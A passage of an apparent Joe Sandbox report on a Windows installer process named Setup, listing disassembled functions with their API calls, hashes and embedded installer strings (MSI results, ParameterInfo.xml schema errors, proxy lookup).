                                                              • Instruction Fuzzy Hash: 3DD05E70840224A6CB14DBB48545FEEBB20BB40708F10840D900036B40CF388A1C87F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SendMessageW.USER32(?,00000172,00000000,?), ref: 6C94BC5A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 6b0a1129d1aa6d4f027a284d2b092b3d9500d4c4aa203c9597ac4b720dabcfd8
                                                              • Instruction ID: 508cfd927b526e53281ab1b53384bb75867847c0bd5b8c8ae132026eac0f555a
                                                              • Opcode Fuzzy Hash: 6b0a1129d1aa6d4f027a284d2b092b3d9500d4c4aa203c9597ac4b720dabcfd8
                                                              • Instruction Fuzzy Hash: E9C012712402047BC7110E95DC05F817EA5D755750F104025F74886150C5719810D784
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6C48FF21
                                                                • Part of subcall function 6C49007B: SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 6C4900A9
                                                                • Part of subcall function 6C49007B: SetWindowPos.USER32(0000000C,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 6C4900E6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Window$ChildEnumWindows
                                                              • String ID:
                                                              • API String ID: 1604351572-0
                                                              • Opcode ID: d7ebcabd0a369c96c972212f4e63bc7f23157945e5ffb8c5847d5e8c99b5af23
                                                              • Instruction ID: 0c46e8c18ccab33fa23796db5c404158295c5794f4513e5613c1f13ee6132bd3
                                                              • Opcode Fuzzy Hash: d7ebcabd0a369c96c972212f4e63bc7f23157945e5ffb8c5847d5e8c99b5af23
                                                              • Instruction Fuzzy Hash: E9C08C3A0030B0766630BB346C08DDB2EAA9F872A0305000BF20091510CA10CC028AE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C975505
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 44ce89a9bdde6ffad1b98b9e586ddcd9fdc58862dd38d06de27d23b7e1e15dcf
                                                              • Instruction ID: 10d1f37c224ba3bcd48150aa1f34e6d2f016c7a870984d18a6656ae34e60af1b
                                                              • Opcode Fuzzy Hash: 44ce89a9bdde6ffad1b98b9e586ddcd9fdc58862dd38d06de27d23b7e1e15dcf
                                                              • Instruction Fuzzy Hash: 80C08031001108F7CB214E40DC05F957F69E741354F24C020B61C15460C773D561D6D4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,6C91B029,?,0000002C,6C95D55B,?,?,?,?,00000001), ref: 6C9491C5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID:
                                                              • API String ID: 542301482-0
                                                              • Opcode ID: 1e827eb7c476ffe770e2d8e3c4081247095a693a024e57192d8e6a7a9f9d3791
                                                              • Instruction ID: 63d80fd6537cb29e7ed46d404fb1386aada1b940305e2e30cc89069203535c2f
                                                              • Opcode Fuzzy Hash: 1e827eb7c476ffe770e2d8e3c4081247095a693a024e57192d8e6a7a9f9d3791
                                                              • Instruction Fuzzy Hash: 40C02B7638020CBBC7200581DC05FA9BE28D7D8754F014012B328144828DB1D820D5E9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C9754E3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 0aac60b44314f77a0179812e11c568e948e9399ccfe580c0f11bf591f4a4b16d
                                                              • Instruction ID: 9b6c3db5af2371e171abb8fd071fa2278a00c0d95fdb0dac8413a018349680e1
                                                              • Opcode Fuzzy Hash: 0aac60b44314f77a0179812e11c568e948e9399ccfe580c0f11bf591f4a4b16d
                                                              • Instruction Fuzzy Hash: A5C09B76140108B7CB111A81DC05F45BF69DB95755F14C061F61805452C773D421D6D4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32(?,6C94A320,512AC3CC,?,?), ref: 6C91C55E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: 27236241d8cd2a6dd92daba320b6ae792e38b0a22e2c8b84cbed3010c8bb5334
                                                              • Instruction ID: 5cae53a725b661e5d42035b6ba37abf57a4fe5b683f118f572a78bcd12fe6304
                                                              • Opcode Fuzzy Hash: 27236241d8cd2a6dd92daba320b6ae792e38b0a22e2c8b84cbed3010c8bb5334
                                                              • Instruction Fuzzy Hash: 7C118272649305AFE724DF25D917B2A7BF8AB00754F10853EE216DAAD0EB74E5048B48
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 94dc90e7c9f986c5ceebce08b163167fc9e1047054cc9e2ec35825078d9e7b0e
                                                              • Instruction ID: 584e1f11e41e5f3f20f55318502105cd8147268a7f5661c49f240edfe65e3d36
                                                              • Opcode Fuzzy Hash: 94dc90e7c9f986c5ceebce08b163167fc9e1047054cc9e2ec35825078d9e7b0e
                                                              • Instruction Fuzzy Hash: 7CA002723486CCD7466055866409E3277BEE1C26E6A5501B1D524425059973E811D9DA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a38e8d0d7fe26c383cb0aced90c9e354cd9603280526a4e3aeea0fe3603578c4
                                                              • Instruction ID: 371102265c50c9f4cd519e8d9c5f8dd97d8d59e77774937e4d1815b575c174f3
                                                              • Opcode Fuzzy Hash: a38e8d0d7fe26c383cb0aced90c9e354cd9603280526a4e3aeea0fe3603578c4
                                                              • Instruction Fuzzy Hash: 72A0223220830CC3032000C32008C3233ACC0C2AA2A0000F0C0200380008B2E800C2C0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aeac856f99a00f3fd365e77432530a281855428fda8c60d2eddf105f7c6056db
                                                              • Instruction ID: cce2bed3779da094b0d22d5d3c48ef3a3f3d2c5bbc6c63c18d6f323ac31e2061
                                                              • Opcode Fuzzy Hash: aeac856f99a00f3fd365e77432530a281855428fda8c60d2eddf105f7c6056db
                                                              • Instruction Fuzzy Hash: 61A0223220828CC3023000822008C32B3ACC0C22A2A0000B0C220020000A32E800E0E2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C91391D: __EH_prolog3.LIBCMT ref: 6C913924
                                                              • __CxxThrowException@8.LIBCMT ref: 6C93A26F
                                                                • Part of subcall function 6C915349: __EH_prolog3.LIBCMT ref: 6C915350
                                                                • Part of subcall function 6C915349: OutputDebugStringW.KERNEL32(?,?,?,00000008,6C9463AF,000013EC,?,00000000,?,?,ReportingFlags,?,-0000000D,?,?,6C8F4A4C), ref: 6C915371
                                                              • SysFreeString.OLEAUT32(?), ref: 6C93A065
                                                              Strings
                                                              • Exe %s has initiated a restart., xrefs: 6C93A08C
                                                              • Exe %s returned success, but changes will not be effective until the service is restarted., xrefs: 6C93A076
                                                              • Performing Action on Exe at , xrefs: 6C939CE1
                                                              • Exe (%s) succeeded., xrefs: 6C93A0A6
                                                              • Exe (%s) failed with 0x%x - %s., xrefs: 6C93A03D
                                                              • Exe log file(s) :, xrefs: 6C939F57
                                                              • PerformOperation on exe returned exit code %u (translates to HRESULT = 0x%x), xrefs: 6C93A1B7
                                                              • complete, xrefs: 6C939C5F
                                                              • Exe (%s) succeeded and requires reboot., xrefs: 6C93A081
                                                              • Action, xrefs: 6C939D07
                                                              • Exe (%s) succeeded (but does not apply to any products on this machine), xrefs: 6C93A09B
                                                              • %s - Exe installer does not provide a log file name, xrefs: 6C939EED
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$String$DebugException@8FreeOutputThrow_memcpy_s
                                                              • String ID: complete$%s - Exe installer does not provide a log file name$Action$Exe %s has initiated a restart.$Exe %s returned success, but changes will not be effective until the service is restarted.$Exe (%s) failed with 0x%x - %s.$Exe (%s) succeeded (but does not apply to any products on this machine)$Exe (%s) succeeded and requires reboot.$Exe (%s) succeeded.$Exe log file(s) :$PerformOperation on exe returned exit code %u (translates to HRESULT = 0x%x)$Performing Action on Exe at
                                                              • API String ID: 4069489755-2724633158
                                                              • Opcode ID: f054520ca215f94f74e78d4e5e2f9fc985aecd5cfc3b0ebbcf9415d8d4cef4e7
                                                              • Instruction ID: 4ab238e6f6503463782b6e56378840687d2cf54afb8b5bc39a6f49694ebdc567
                                                              • Opcode Fuzzy Hash: f054520ca215f94f74e78d4e5e2f9fc985aecd5cfc3b0ebbcf9415d8d4cef4e7
                                                              • Instruction Fuzzy Hash: 401249711083419FD721CF68C884B5ABBE5BFAA318F044A1DF199D7B91CB35E909CB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C927E1E
                                                              • __CxxThrowException@8.LIBCMT ref: 6C927FA8
                                                              • __EH_prolog3.LIBCMT ref: 6C927FBA
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9280A9
                                                                • Part of subcall function 6C968E8C: __CxxThrowException@8.LIBCMT ref: 6C968EA0
                                                                • Part of subcall function 6C94878F: __EH_prolog3.LIBCMT ref: 6C948796
                                                                • Part of subcall function 6C94878F: _wcsspn.LIBCMT ref: 6C9487D2
                                                                • Part of subcall function 6C94878F: _wcscspn.LIBCMT ref: 6C9487E8
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                              Strings
                                                              • a valid UninstallCommandLine is required., xrefs: 6C92804B
                                                              • has invalid LogFileHint, xrefs: 6C928182
                                                              • schema validation failure: , xrefs: 6C92816D
                                                              • schema validation failure: The InstallCommandLine, UninstallCommandLind and RepairCommandLine of an ExeBase of MsuPackage like , xrefs: 6C928256
                                                              • must be empty., xrefs: 6C92826B
                                                              • [%s] - schema validation failure. Environment variable cannot be expanded! Name sould contain minimum of a valid environmental var, xrefs: 6C927F32
                                                              • ParameterInfo.xml, xrefs: 6C927F63, 6C928026, 6C92815D, 6C928246, 6C92835E
                                                              • [%s] - schema validation failure. Name sould contain minimum of a valid environmental variable pointing to an installed program to, xrefs: 6C927F55
                                                              • schema validation failure. URL, HashValue and DownLoadSize attributes are not valid for LocalExe type like , xrefs: 6C92836E
                                                              • ", xrefs: 6C9283BD
                                                              • When Rollback is true for item , xrefs: 6C928036
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw$_wcscspn_wcsspn
                                                              • String ID: a valid UninstallCommandLine is required.$ has invalid LogFileHint$ must be empty.$"$ParameterInfo.xml$When Rollback is true for item $[%s] - schema validation failure. Environment variable cannot be expanded! Name sould contain minimum of a valid environmental var$[%s] - schema validation failure. Name sould contain minimum of a valid environmental variable pointing to an installed program to$schema validation failure. URL, HashValue and DownLoadSize attributes are not valid for LocalExe type like $schema validation failure: $schema validation failure: The InstallCommandLine, UninstallCommandLind and RepairCommandLine of an ExeBase of MsuPackage like
                                                              • API String ID: 200342494-2088432839
                                                              • Opcode ID: 81de2b8afdbce1bfb2b2597ad0776f7c6171874a76c5c011675358e803863020
                                                              • Instruction ID: 40f0e1d27233e6112707469782715df3d974bb77c6ca4b7bc410c2db30e07f7a
                                                              • Opcode Fuzzy Hash: 81de2b8afdbce1bfb2b2597ad0776f7c6171874a76c5c011675358e803863020
                                                              • Instruction Fuzzy Hash: 4C02B032900248DFDB14DBF8C944BDDB7B8AF25328F148256E060B7B81D734DA49CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C965C3D
                                                              • GetLastError.KERNEL32(?,Setup Installer,00000001,00000000,00000000,00000000,?,?,6C964247,00000000,?), ref: 6C965C90
                                                                • Part of subcall function 6C917479: __EH_prolog3.LIBCMT ref: 6C917480
                                                              • GlobalFree.KERNEL32(?), ref: 6C965CB7
                                                              • GlobalFree.KERNEL32(?), ref: 6C965CC4
                                                              • GlobalFree.KERNEL32(?), ref: 6C965CD1
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D20
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D2D
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D3A
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D5D
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D6A
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D77
                                                              Strings
                                                              • WinHttpGetIEProxyConfigForCurrentUser, xrefs: 6C965C99
                                                              • Retrieving proxy information using WinHttpGetIEProxyConfigForCurrentUser, xrefs: 6C965C49
                                                              • Unable to retrieve Proxy information although WinHttpGetIEProxyConfigForCurrentUser called succeeded, xrefs: 6C965D45
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FreeGlobal$H_prolog3$ErrorLast
                                                              • String ID: Retrieving proxy information using WinHttpGetIEProxyConfigForCurrentUser$Unable to retrieve Proxy information although WinHttpGetIEProxyConfigForCurrentUser called succeeded$WinHttpGetIEProxyConfigForCurrentUser
                                                              • API String ID: 3758970598-3016001025
                                                              • Opcode ID: 351354564255dea16ec7c66caef12f08481beb3aad3a747039450f0d4b6dc028
                                                              • Instruction ID: 755fbdcbb36d6543a1a4a22abc7199df7e920f6238fbda81cf2eb8b93926026b
                                                              • Opcode Fuzzy Hash: 351354564255dea16ec7c66caef12f08481beb3aad3a747039450f0d4b6dc028
                                                              • Instruction Fuzzy Hash: DA410271D02628DFDF029FA6C9449DCFBB5BF58B18F24402AE410B6AA5C735D940CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92BD33
                                                                • Part of subcall function 6C921D3D: __EH_prolog3.LIBCMT ref: 6C921D44
                                                                • Part of subcall function 6C921D3D: __CxxThrowException@8.LIBCMT ref: 6C921E11
                                                              • __CxxThrowException@8.LIBCMT ref: 6C92C09E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID: ($ApplicableIf$IsPresent$MSP$ParameterInfo.xml$PatchCode$RepairOverride$UninstallOverride$schema validation failure: MSP does not support RepairOverride or UninstallOverride child elements!$schema validation failure: Patch Code cannot be empty!$schema validation failure: wrong number of MSP child nodes!
                                                              • API String ID: 3670251406-3439019449
                                                              • Opcode ID: ba41765bb72bf0f823ad4b23694f3ae13fca7e5821f4794e746ce3b4086f3aab
                                                              • Instruction ID: 1fdabe322c8aa70889418273a53b5848d472b8c8afe7a2599b66a3bfa56e9cff
                                                              • Opcode Fuzzy Hash: ba41765bb72bf0f823ad4b23694f3ae13fca7e5821f4794e746ce3b4086f3aab
                                                              • Instruction Fuzzy Hash: DC027071A00249EFDB04DFA8C945ADEBBB9BF25308F148559F424DBB80C734DA09CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C916DA0
                                                                • Part of subcall function 6C915F12: __EH_prolog3.LIBCMT ref: 6C915F19
                                                                • Part of subcall function 6C915F12: PathIsDirectoryW.SHLWAPI(?), ref: 6C915F56
                                                              Strings
                                                              • %s (%s) succeeded on product (%s). Msi Log: <a href="%s">%s</a>, xrefs: 6C9170A9
                                                              • : no error, xrefs: 6C9170DD
                                                              • %s (%s) succeeded on product (%s) and requires reboot. Msi Log: <a href="%s">%s</a>, xrefs: 6C916F53
                                                              • : ERROR_SUCCESS_RESTART_REQUIRED, xrefs: 6C916EF7
                                                              • %s (%s) succeeded on product (%s) and requires the service to be restarted. Msi Log: <a href="%s">%s</a>, xrefs: 6C916EC3
                                                              • : ERROR_SUCCESS_REBOOT_INITIATED, xrefs: 6C917025
                                                              • Return value - 0x%X, xrefs: 6C916DD6
                                                              • : ERROR_SUCCESS_REBOOT_REQUIRED, xrefs: 6C916F87
                                                              • : ERROR_UNKNOWN_PRODUCT (not actually an error - patch does not apply to this product), xrefs: 6C91704D
                                                              • %s (%s) succeeded on product (%s) and a reboot has been initiated!!!!. Msi Log: <a href="%s">%s</a>, xrefs: 6C916FF1
                                                              • %s (%s) failed on product (%s). Msi Log: <a href="%s">%s</a>, xrefs: 6C916E4A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DirectoryPath
                                                              • String ID: %s (%s) failed on product (%s). Msi Log: <a href="%s">%s</a>$%s (%s) succeeded on product (%s) and a reboot has been initiated!!!!. Msi Log: <a href="%s">%s</a>$%s (%s) succeeded on product (%s) and requires reboot. Msi Log: <a href="%s">%s</a>$%s (%s) succeeded on product (%s) and requires the service to be restarted. Msi Log: <a href="%s">%s</a>$%s (%s) succeeded on product (%s). Msi Log: <a href="%s">%s</a>$: ERROR_SUCCESS_REBOOT_INITIATED$: ERROR_SUCCESS_REBOOT_REQUIRED$: ERROR_SUCCESS_RESTART_REQUIRED$: no error$: ERROR_UNKNOWN_PRODUCT (not actually an error - patch does not apply to this product)$Return value - 0x%X
                                                              • API String ID: 529697523-3126805711
                                                              • Opcode ID: e8f83060fb42c9ad5febde78104c832bf62037584ccfc6e34cb949dbc7f691a8
                                                              • Instruction ID: 9b6aca7310834ffdfc0f0b71b47b2e5573f909f579347058ab7501e3a6721a1f
                                                              • Opcode Fuzzy Hash: e8f83060fb42c9ad5febde78104c832bf62037584ccfc6e34cb949dbc7f691a8
                                                              • Instruction Fuzzy Hash: 34C19E71900209EFCF01CFA8C940ADDBBB2BF69318F148545F511ABBA1C731EA65DB55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
